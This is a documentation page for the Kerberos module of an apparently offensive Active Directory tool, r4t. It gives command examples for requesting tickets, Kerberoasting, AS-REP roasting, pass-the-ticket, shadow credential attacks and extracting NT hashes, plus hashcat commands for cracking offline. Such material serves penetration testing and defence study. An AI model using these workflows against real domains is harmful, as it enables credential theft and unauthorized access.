Skip to main content

krb (Kerberos)

The krb command provides Kerberos ticket operations: obtaining TGTs and TGSs, and extracting NT hashes via PKINIT + UnPAC-the-Hash.

Usage

r4t krb <subcommand> [flags]

Persistent Flags

FlagDescription
--dcsLoad domain controllers from the database as targets

Subcommands

krb tgt

Obtain a Ticket Granting Ticket (TGT) for an account. 
# Using stored credential (password or hash)
r4t krb tgt

# Specific target DC
r4t krb tgt dc01.corp.example.com

# With explicit credentials
r4t krb tgt -u jsmith -p 'P@ssword1' -d corp.example.com dc01.corp.example.com

# Using AES key
r4t krb tgt --aes <aes-key> -u jsmith -d corp.example.com

# Using PFX certificate (PKINIT)
r4t krb tgt --pfx /tmp/user.pfx dc01.corp.example.com

# Using shadow credential private key (no cert, key-only PKINIT)
r4t krb tgt --key /tmp/shadow.key -u jsmith -d corp.example.com

Flags

FlagDescription
--upnUser Principal Name (optional override)
--keyPrivate key file for shadow credential / key-only PKINIT
--pfxPFX file for PKINIT authentication
--pfx-passwordPFX passphrase
--aesAES-128 or AES-256 key
The resulting TGT is:
  • Written to a ccache file (path printed to stdout)
  • Stored in the tgts table in SQLite
  • Linked to the active credential record

krb tgs

Obtain a Ticket Granting Service ticket (TGS) for a specific SPN. Used for Kerberoasting. 
# Get TGS for a specific SPN
r4t krb tgs --spn "HTTP/app.corp.example.com"

# With SID targeting
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433" --sid S-1-5-21-...

Flags

FlagDescription
--spnTarget Service Principal Name (required)
--sidTarget account SID
The resulting TGS is:
  • Written as a kirbi/ccache file
  • Output in hashcat format for offline cracking ($krb5tgs$23$...)
  • Stored in the tgss table and the hash in kerberoast_hashes

krb nt

Extract the NT hash of an account using PKINIT + UnPAC-the-Hash. This requires a valid certificate for the target account. Authenticate via Kerberos PKINIT to receive a TGT, then extract the NT hash embedded in the PAC (Privilege Attribute Certificate). 
# Using stored PFX credential
r4t krb nt

# With explicit PFX
r4t krb nt --pfx /tmp/admin.pfx

# Override UPN
r4t krb nt --upn administrator@corp.example.com

Flags

FlagDescription
--upnOverride the UPN used for PKINIT
The extracted NT hash is printed and stored in the credentials table.
This is the same operation as adcs nt — both subcommands perform PKINIT + UnPAC-the-Hash. krb nt is the Kerberos-centric entry point, adcs nt is the ADCS-centric one.

Kerberos Authentication Methods

R4t supports all standard Kerberos authentication pre-authentication methods:
MethodDescription
PasswordStandard PA-ENC-TIMESTAMP
NT HashRC4-HMAC pre-auth
AES KeyAES-128 or AES-256 pre-auth
PKINIT (PFX)Public key pre-authentication with PFX certificate
PKINIT (PEM)Public key pre-authentication with PEM cert + key
PKINIT (Key-only)Shadow credential attack — key without a certificate

Ticket Storage

TableContents
tgtsKerberos TGTs (base64-encoded ticket, expiry, target DC)
tgssKerberos TGSs (ticket, SPN, encryption type)
kerberoast_hashesKerberoastable TGS hashes in hashcat format
asrep_hashesAS-REP roastable hashes

Common Kerberos Workflows

Kerberoasting

# 1. Find Kerberoastable accounts
r4t ldap get spn

# 2. Get TGS for each SPN
r4t krb tgs --spn "MSSQLSvc/sql.corp.example.com:1433"

# 3. Crack offline
hashcat -m 13100 kerberoast.hash wordlist.txt

AS-REP Roasting

# Find AS-REP roastable accounts (no pre-auth required)
r4t ldap scan

# View AS-REP hashes
r4t dbquery "SELECT * FROM asrep_hashes"

# Crack offline
hashcat -m 18200 asrep.hash wordlist.txt

Pass-the-Ticket

# Get a TGT and save to ccache
r4t krb tgt -u jsmith --hash <hash> -d corp.example.com

# Use the ccache in subsequent commands
export KRB5CCNAME=/tmp/jsmith.ccache
r4t ldap get users --ccache /tmp/jsmith.ccache

Shadow Credential Attack

# 1. Inject a key credential (via ldap dacl + modify or dedicated tool)
# 2. Get TGT using the private key
r4t krb tgt --key /tmp/injected.key -u targetuser -d corp.example.com

# 3. Extract NT hash
r4t krb nt --key /tmp/injected.key -u targetuser -d corp.example.com

PKINIT from ADCS Certificate

# After obtaining a certificate via adcs req
r4t krb tgt --pfx /tmp/admin.pfx

# Or extract the NT hash directly
r4t krb nt --pfx /tmp/admin.pfx